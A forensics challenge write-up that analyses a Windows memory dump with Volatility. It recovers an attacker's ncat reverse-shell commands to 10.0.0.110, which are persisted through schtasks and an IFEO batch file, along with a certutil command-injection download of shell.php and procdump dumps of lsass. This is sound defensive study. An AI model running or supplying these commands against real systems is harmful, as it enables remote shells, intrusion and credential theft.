4852    powershell.exe  32      SeRelabelPrivilege              Modify the mandatory integrity level of an object
4852    powershell.exe  33      SeIncreaseWorkingSetPrivilege   Present Allocate more memory for user applications
4852    powershell.exe  34      SeTimeZonePrivilege     Present Adjust the time zone of the computer's internal clock
4852    powershell.exe  35      SeCreateSymbolicLinkPrivilege   Present Required to create a symbolic link
4852    powershell.exe  36      SeDelegateSessionUserImpersonatePrivilege       Present Obtain an impersonation token for another user in the same session.

Q: How many privileges are these two processes running with?
A: The process at PID 7164 and PID 4852 are both running with 35 privileges.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 | sed '1,4d'  | wc --lines
35

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d'  | wc --lines
35


Looking at the SIDS, the process was running as:

Q: What SIDs is the VMware process at 7164 running with?
A: vmtoolsd.exe at 7164 is running with the following SIDs
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 7164
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
PID     Process SID     Name

7164    vmtoolsd.exe    S-1-5-21-1563833629-3224366856-3602044515-1001  securitynik
7164    vmtoolsd.exe    S-1-5-21-1563833629-3224366856-3602044515-513   Domain Users
7164    vmtoolsd.exe    S-1-1-0 Everyone
7164    vmtoolsd.exe    S-1-5-114       Local Account (Member of Administrators)
7164    vmtoolsd.exe    S-1-5-32-544    Administrators
7164    vmtoolsd.exe    S-1-5-32-545    Users
7164    vmtoolsd.exe    S-1-5-4 Interactive
7164    vmtoolsd.exe    S-1-2-1 Console Logon (Users who are logged onto the physical console)
7164    vmtoolsd.exe    S-1-5-11        Authenticated Users
7164    vmtoolsd.exe    S-1-5-15        This Organization
7164    vmtoolsd.exe    S-1-5-113       Local Account
7164    vmtoolsd.exe    S-1-5-5-0-1032752       Logon Session
7164    vmtoolsd.exe    S-1-2-0 Local (Users with the ability to log in locally)
7164    vmtoolsd.exe    S-1-5-64-10     NTLM Authentication
7164    vmtoolsd.exe    S-1-16-8192     Medium Mandatory Level

Q: What SIDs is the PowerShell process at 4852 running with?
A: PowerShell at 4852 is running with the following SIDs

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.getsids.GetSIDs --pid 4852
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
PID     Process SID     Name

4852    powershell.exe  S-1-5-21-1563833629-3224366856-3602044515-1001  securitynik
4852    powershell.exe  S-1-5-21-1563833629-3224366856-3602044515-513   Domain Users
4852    powershell.exe  S-1-1-0 Everyone
4852    powershell.exe  S-1-5-114       Local Account (Member of Administrators)
4852    powershell.exe  S-1-5-32-544    Administrators
4852    powershell.exe  S-1-5-32-545    Users
4852    powershell.exe  S-1-5-4 Interactive
4852    powershell.exe  S-1-2-1 Console Logon (Users who are logged onto the physical console)
4852    powershell.exe  S-1-5-11        Authenticated Users
4852    powershell.exe  S-1-5-15        This Organization
4852    powershell.exe  S-1-5-113       Local Account
4852    powershell.exe  S-1-5-5-0-1032752       Logon Session
4852    powershell.exe  S-1-2-0 Local (Users with the ability to log in locally)
4852    powershell.exe  S-1-5-64-10     NTLM Authentication
4852    powershell.exe  S-1-16-12288    High Mandatory Level


Very disappointed that I still do not have enough concrete evidence to sell my case. However, there is still enough to take action. At this point, let's move forward with the challenge questions. We will find more evidence as we move along.

Q: What "Integrity Level" is this powershell.exe process at PID 4852 running with?
A: PowerShell at 4852 is running with "High Mandatory Level"

Q: What "Integrity Level" is the VMWare process at PID 7164 running with?
A: VMWare process at 7164 is running with "Medium Mandatory Level"

Looking for persistence.

Starting with the Registry Hives:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.hivelist.HiveList> hivelist.txt
Progress:  100.00               PDB scanning finished

Q How many entries were returned for the registry hive list?
A: 42.  Remember the lines at the top of the file needs to be removed:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat hivelist.txt | sed '1,4d' | wc --lines
42

Q: How many programs seems to be configured to start when the user computer starts up and the user logs in?
A: Looking at the run key it seems to be 1.

Q: What is the name of the program configured to start at login?
A: It seems oneDriveSetup.exe is the only program configured to start at login.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows\CurrentVersion\Run"
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Last Write Time Hive Offset     Type    Key     Name    Data    Volatile
...
2023-07-12 04:42:30.000000      0xb98420e97000  REG_SZ  \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run    OneDriveSetup   "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup"   False
2023-07-12 04:42:29.000000      0xb98421072000  REG_SZ  \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run  OneDriveSetup   "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup"   False


Continuing this hunt for persistence. 

Above, we saw ncat.exe is being used answer the follow questions:

Q: What is the full path is ncat.exe being run form?
A: 'c:\Program Files (x86)\Nmap\ncat.exe'

Q: is ncat.exe using a "normal user" prompt or an "Administrator" prompt?
A: "Administrator"

Q: What is the full command line of the ncat.exe being used to establish persistence?
A: schtasks  /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f


Q: Which Windows utility is being used to establish this persistence?
A: schtasks.exe

All of these questions can be answered from below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "ncat" | sort --unique | grep 'schtask'
]0;Administrator: Command Prompt - schtasks  /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f

Q: What is the objective of this persistence mechanism?
A: This schedule task is set to send this host command prompt via SSL to the host at 10.0.0.110 on port 443 at 2 AM Daily.

IP 10.0.0.110 seems to be a prominent fixture through this incident. Even further evidence that we should be concerned about this host.

Extract all ASCII Strings.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp > strings.txt

Not to worry, I know I should look at the other encodings also via "--encoding=[s|S|b|l|B|L]". However, this is the approach I am taking for this challenge.

There seems to be some interaction with the "upload" folder. 
Q: What is the name of the file uploaded? 
A: The uploaded file is "shell.php"

Q: What is the tool used to allow the threat actor to live off the land to "upload" one or more files?
A: Tool used to live off the land is "certutil.exe"

Q: What type of vulnerability does it seem the threat actor was able to leverage?
A: The vulnerability is command injection

Q: What is the full command that was used to exploit this vulnerability?
A: See below for all the additional information.

Below also answers all the questions above.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep "10.0.0.110" strings.txt | grep certutil
.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=SubmitP
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
cmd.exe /s /c "ping  127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ."
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit_
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit"M{
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.phppload%5Cshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit

Looking at the "DeviceType"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.devicetree.DeviceTree > devicetree.txt
Progress:  100.00               PDB scanning finished

Q: How many unique device types are seen within the memory dump?
A: 30 unique devices

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d' | wc --lines
30

While above reports 30, the answer is 29 because there is a line in the middle that is empty with "2".

Q: What is/are the name(s) of the devices?
A: See below

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d'
     48 FILE_DEVICE_UNKNOWN
     21 FILE_DEVICE_DISK
     19 FILE_DEVICE_NETWORK
     18 UNKNOWN
     12 FILE_DEVICE_BUS_EXTENDER
      9 FILE_DEVICE_MOUSE
      9 FILE_DEVICE_DISK_FILE_SYSTEM
      9 FILE_DEVICE_CONTROLLER
      7 FILE_DEVICE_NETWORK_FILE_SYSTEM
      5 FILE_DEVICE_KS
      3 FILE_DEVICE_VIDEO
      3 FILE_DEVICE_NAMED_PIPE
      3 FILE_DEVICE_CD_ROM
      2 FILE_DEVICE_NULL
      2 FILE_DEVICE_MAILSLOT
      2 FILE_DEVICE_ACPI
      2
      1 FILE_DEVICE_TRANSPORT
      1 FILE_DEVICE_TAPE_FILE_SYSTEM
      1 FILE_DEVICE_SOUND
      1 FILE_DEVICE_SERIAL_PORT
      1 FILE_DEVICE_SCREEN
      1 FILE_DEVICE_PHYSICAL_NETCARD
      1 FILE_DEVICE_NETWORK_BROWSER
      1 FILE_DEVICE_KSEC
      1 FILE_DEVICE_KEYBOARD
      1 FILE_DEVICE_CD_ROM_FILE_SYSTEM
      1 FILE_DEVICE_BEEP
      1 FILE_DEVICE_BATTERY
      1 FILE_DEVICE_8042_PORT

Q: From the device tree how many have a "DeviceName" of HTTP and  a "DriverNameofAttDevice" of "ClientSession"?
A: There is only 1 HTTP "ClientSession"

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | grep --perl-regexp 'HTTP|ClientSession'
0xe78beff21e50  DRV     HTTP    N/A     N/A     N/A
* 0xe78beff21e50        DEV     HTTP    ClientSession   N/A     FILE_DEVICE_NETWORK


In the list of ESTABLISHED network sessions, we also saw there is a SSH connection:

Q: What does the SSH manpage say about "-D"?
A: If we look at the SSH Manpage, we see -D [bind_address:]port.

This means we can specify an IP address with the port. Since we already know the port we can assume at a minimum it is listening on 127.0.0.1. Let's test that theory.


Q: What is the full path(s) of the SSH "known_hosts" file on this system:
A:  
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "known_hosts" | sort --unique
4known_hosts (C:\Users\administrator.SECURITYNIK-WIN\.ssh)
4known_hosts (C:\Users\securitynik\.ssh)
*!C:\Users\administrator.SECURITYNIK-WIN\.ssh\known_hosts.old
!C:\Users\securitynik\.ssh\known_hosts
C:\Users\securitynik/.ssh/known_hosts
C:\Users\securitynik/.ssh/known_hosts2
!C:\Users\securitynik\.ssh\known_hosts.old

We can also see that it seems SSH was being used as a local "dynamic" proxy. 
We learned this above, so this is just reinforcement of our knowledge. 
This could be used for relaying/proxying communication. 

Q: What is the command line, local port, username and remote IP address that SSH proxy connection is using?
A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'ssh\s+\-D'
ssh  -D 9999 kali@10.0.0.110 -N -vvv
]0;Administrator: Windows PowerShell - ssh  -D 9999 kali@10.0.0.110 -N -vvv

Q: What does the "-N" do in the identified command?
A: "Do not execute a remote command.  This is useful for just forwarding ports"

Q: Is the PowerShell prompt running as a "normal user" or "Administrator" ?
A: "Administrator"

Q: What is the application that seems to be connecting to the local "dynamic" proxy?
A: chrome.exe

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "chrome" | grep "127.0.0.1:9999"
chrome.exe  --proxy-server="socks5://127.0.0.1:9999"
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --proxy-server=socks5://127.0.0.1:9999 --mojo-platform-channel-handle=2144 --field-trial-handle=1868,i,3512365481249750963,10747349760151142710,262144 /prefetch:8
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
chrome.exe --proxy-server="socks5://127.0.0.1:9999"

Staying a bit on this port 9999 traffic. What else is going on there.

At the same time, we saw port 443 earlier. Let's see what we can find for these two ports

Q: What was/were the name of the file(s) downloaded from http://10.0.0.108:9999?
A: Looks like putty_64.exe, putty_x64.exe, putty.exe and putty_x64.md5.txt were all downloaded 

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'http*://10.0.0.108:(443|9999).*' --only-matching | sort --unique | grep --perl-regexp '(\.exe|\.txt)' | sed 's/"//'
http://10.0.0.108:9999/putty_64.exe
http://10.0.0.108:9999/putty_64.exe)
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty_x64.exe
http://10.0.0.108:9999/putty_x64.md5.txt


Q: Where is/are the executable file(s) seen in the previous question stored on the system?
A: The executable files is stored primarily in the c:\users\securitynik\Downloads folder

We can see above the locations of where the files were stored on the file system.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | grep --perl-regexp 'putty.*?\.exe' | grep --ignore-case --perl-regexp "^c:.*?\.exe$"
C:\Users\securitynik\Downloads\putty_x64 (2).exe
C:\Users\securitynik\Downloads\putty_64.exe
C:\TOOLS\elitewrap\original_putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty_new.exe


Extracting data from the file system. Grabbing all the files found storing them in a txt file for further analysis.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.filescan > filescan.txt
Progress:  100.00               PDB scanning finished


Q: When performing a filescan, how many files/lines were returned?
A: There were 8035 lines found but 8029 files.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | wc --lines
8029

Q: Similarly, how many unique files were returned?
A: There were 3227 unique files returned. Note, there were 6 lines reported with non-ASCII characters.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | uniq | head --lines -6 | wc --lines                                                                                                                   
3227

Q: What were the top 10 files/lines found. Note, in this case directory paths would also be considered as files for this purpose?
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse  |  head --lines=10
   1480 \$Directory
    469 \Program
    359 \Users\securitynik\AppData\Local\Google\Chrome\User
    223 \$MapAttributeValue
    172 \Users\securitynik\AppData\Local\Microsoft\Edge\User
    158 \CMNotify
    140 \Windows\System32
    109 \Windows\Registration\R000000000006.clb
    107 \Endpoint
     77 \Windows\System32\svchost.exe
	....

Q: Of these unique files, how many are text (".txt") files and what are their counts?
A: 3 Files returned with .txt extension.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse  | grep ".txt"
      1 \xampp\readme_de.txt
      1 \Windows\appcompat\pca\PcaAppLaunchDic.txt
      1 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

We know above, that PowerShell was a cause of concern. Maybe this "ConsoleHost_history.txt" file has information that may be able to help us understand what transpired. We did not get enough insights from the command line output. Maybe, just maybe, there is something useful in this file. Time will tell.

From the list of files returned, there seems to be a mapped/network drive. 

Q: What is the drive letter associated with the mapped/network drive?
A: Z: 

Q: What is the path of this mapped/network drive?
A: \;Z:00000000000fc3bd\vmware-host\Shared

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | tail --lines=2 | sort --unique
\;Z:00000000000fc3bd\vmware-host\Shared

Preparing to dump the contents of the PowerShell history file. Create a folder to story the files.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir powershell_history && ls powershell_history

Get the address of the PowerShell history from the filescan.txt file.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep "\ConsoleHost_history.txt"
0xe78bf2f82a00  \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt      216

Dump the address:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir powershell_history/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf2f82a00
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf2f82a00  ConsoleHost_history.txt file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat

Q: What network scanning tool was being searched for via the command prompt?
A: nmap.exe 

Q: What is the command used to perform the search?
A: "dir /s c:\nmap.exe"

Q: What is in this PowerShell history file? As in reconstruct this file to get its contents.
A: The commands that were run on the host inside of the PowerShell prompt as seen below

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat powershell_history/file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe
dir
cd ..
dir
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe putty.exe
exit
d:
cmd
exit
cd \
cd tools
cd .\SysinternalsSuite\
.\procdump.exe -ma lsass.exe c:\tmp\lsass.dmp
ps
.\procdump.exe -ma TabTip tabtip.dmp
.\procdump.exe -ma msedge.exe msedge.dmp
del *.tmp
del *.dmp
dir *.dmp
del .\notepad.dmp .\firefox.dmp
del .\FindLinks.exe
del .\firefox.dmp
cd \
cd tools
cd .\SysinternalsSuite\
del .\firefox.dmp
.\procdump.exe -ma msedge.exe c:\tmp\edge.dmp
dir c:\tmp\edge.dmp
.\procdump.exe -ma lsass.exe c:\tmp\lsass.exe.dmp
dir c:\tmp
.\procdump64.exe /?
.\procdump.exe -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
.\procdump.exe -accepteula -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
cls
psexec -h
cmd
cd 'C:\Program Files\'
dir
cd ..
cd '.\Program Files (x86)\'
dir
cd .\Microsoft\
dir
cd .\Edge\
dir
cd .\Application\
dir
cd .\114.0.1823.79\
dir
.\msedge.exe --proxy-server="socks5://127.0.0.1:9999"
cd "c:\Program Files (x86)\Google\Chrome\Application\"
cd "c:\Program Files (x86)\Google\Chrome\Application\"cd ..
cd ..
cd \
cd '.\Program Files\'
dir
cd .\Google\
dir
cd .\Chrome\
dir
cd .\Application\
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
cmd
dir /s c:\nmap.exe

Summary of file contents

Above confirms some of what we saw before. Let's however take a quick synopsis.

invoke-webrequest was used to download the putty.exe file. We also see attempts to dump the lsass.exe process which contains all the credential information. We can see procdump was run multiple times in different forms in an attempt to dump lsass.exe. Maybe these failed?! 

One common tool used for dumping passwords is mimikatz, maybe we should check if this was found in the files. 

Q: Was minimkatz found within this memory dump?
A: Yes

Q: If Yes: What is the path it can be found in?
A: C:\TOOLS\mimikatz_trunk

We also see attempts to dump tabtip and msedge.exe from the memory using procdump. All *.tmp  and *.dmp files were deleted along with some other files. We also see attempts to use msedge.exe with the proxy server which was setup earlier. Maybe that did not work, then the attempt was made to use chrome.exe. We also see a search on the cmd.exe shell for nmap.exe


While we are here. There is a batch file (".bat") that was found.

Q: What does "ifeo" stand for?
A: IFEO stands for Image File Execution Options. In this case, I can configure this batch file to run whenever notepad (or any other application) is started. This way, whenever you run notepad (or that application), execute this script and gain access to your computer.


Make a directory to dump ncat.exe contents.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir ncat_dump

Extract the file at that memory address.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr  0xe78bf6e4f250
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf6e4f250  ncat-ifeo.bat   file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat

Q: What is the virtual address of this file?
A: The address of the .bat file is at "0xe78bf6e4f250"

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep --perl-regexp '\.bat'
0xe78bf6e4f250  \TOOLS\ncat-ifeo.bat    216

Q: What is the contents of this file?
A: See below.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
cmd.exe /c start c:\tools\ncat.exe --nodns --verbose 10.0.0.110 80 --exec cmd.exe

Q: What will be achieved when this command is run?
A: Looking at the ifeo.bat file, we see the host is configured to send its shell (cmd.exe) to the device at 10.0.0.110 on port 80. While the port is different, this is similar to what we saw with the persistence mechanism earlier. Even more reason to conclude the attacker may be at 10.0.0.110.

When looking at the file scan, we see saw two entries for ncat.exe.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat filescan.txt | grep ncat.exe
0xe78bf6aa7120  \Program Files (x86)\Nmap\ncat.exe      216
0xe78bf6ad55c0  \Program Files (x86)\Nmap\ncat.exe      216

We can extract both files and confirm their hashes.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6aa7120
Volatility 3 Framework 2.5.2
Progress:  100.00       PDB scanning finished
Cache   FileObject      FileName        Result

ImageSectionObject      0xe78bf6aa7120  ncat.exe  file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6ad55c0
Volatility 3 Framework 2.5.2
Progress:  100.00       PDB scanning finished
Cache   FileObject      FileName        Result

ImageSectionObject      0xe78bf6ad55c0  ncat.exe  file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
89dc4c7b0477978aa3b7dfb4e7a93163  ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
89dc4c7b0477978aa3b7dfb4e7a93163  ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
45860d2ded9caca15c1d10e756e1a0c7  ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat


Q: How many files are seen for ncat.exe?
A: 2

Q: If you had multiple files, are these files the same?
A: Yes. The hashes say they are.

Q: If they are, what makes you conclude so?
A: Their md5sum hash
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
89dc4c7b0477978aa3b7dfb4e7a93163  ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
89dc4c7b0477978aa3b7dfb4e7a93163  ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img


Q: What type of "file" is this?
A: This is a Windows 32-bit executable. Here is the file information.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ file ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows, 5 sections

Q: What architecture (x86 or x64) was it designed for?
A: 80386 or x86 or i386

Q: What OS is it designed to run on?
A: Windows

Q: What type of application is it? (GUI or console)?
A: Console Application

Q: How many sections are there in this file?
A: 5 Sections

Q: What is/are the name(s) of the section(s) header(s)
A: 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --section-headers

ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img:     file format pei-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .text         000442dd  002e1000  002e1000  00000400  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
  1 .rdata        0000ccce  00326000  00326000  00044800  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .data         00000600  00333000  00333000  00051600  2**2
                  CONTENTS, ALLOC, LOAD, DATA
  3 .rsrc         000001e0  00336000  00336000  00051c00  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .reloc        00003400  00337000  00337000  00051e00  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA

Q: What is the name of the section at index 0?
A: .text

Q: What does this section typically contain?
A: The .text section is where the actual code is kept.

Q: What is the virtual memory address of the "AddressOfEntryPoint" for the executable?
A: 00044663. Indicates the location of the entry point of the application. Another way of looking at it, is the address from which the Windows loader will begin execution.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ objdump ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img --all-headers | grep 'AddressOfEntryPoint'
BFD: error: ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img(.reloc) is too large (0x3400 bytes)
AddressOfEntryPoint     00044663

Q: What is the file size of the extracted file?
Q: What is the File Modification Date/Time?
Q: What is the file Access Date/Time?
Q: What is the File Permissions?
Q: What I the "Linkver Version" used to link this file?
Q: What is the Time Stamp on the file?
Q: What is the OS Version, Image Version and Subsystem version?
Q: What is the Subsystem?

A: All the answers can be found below:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ exiftool ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ExifTool Version Number         : 12.67
File Name                       : file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
Directory                       : ncat_dump
File Size                       : 339 kB
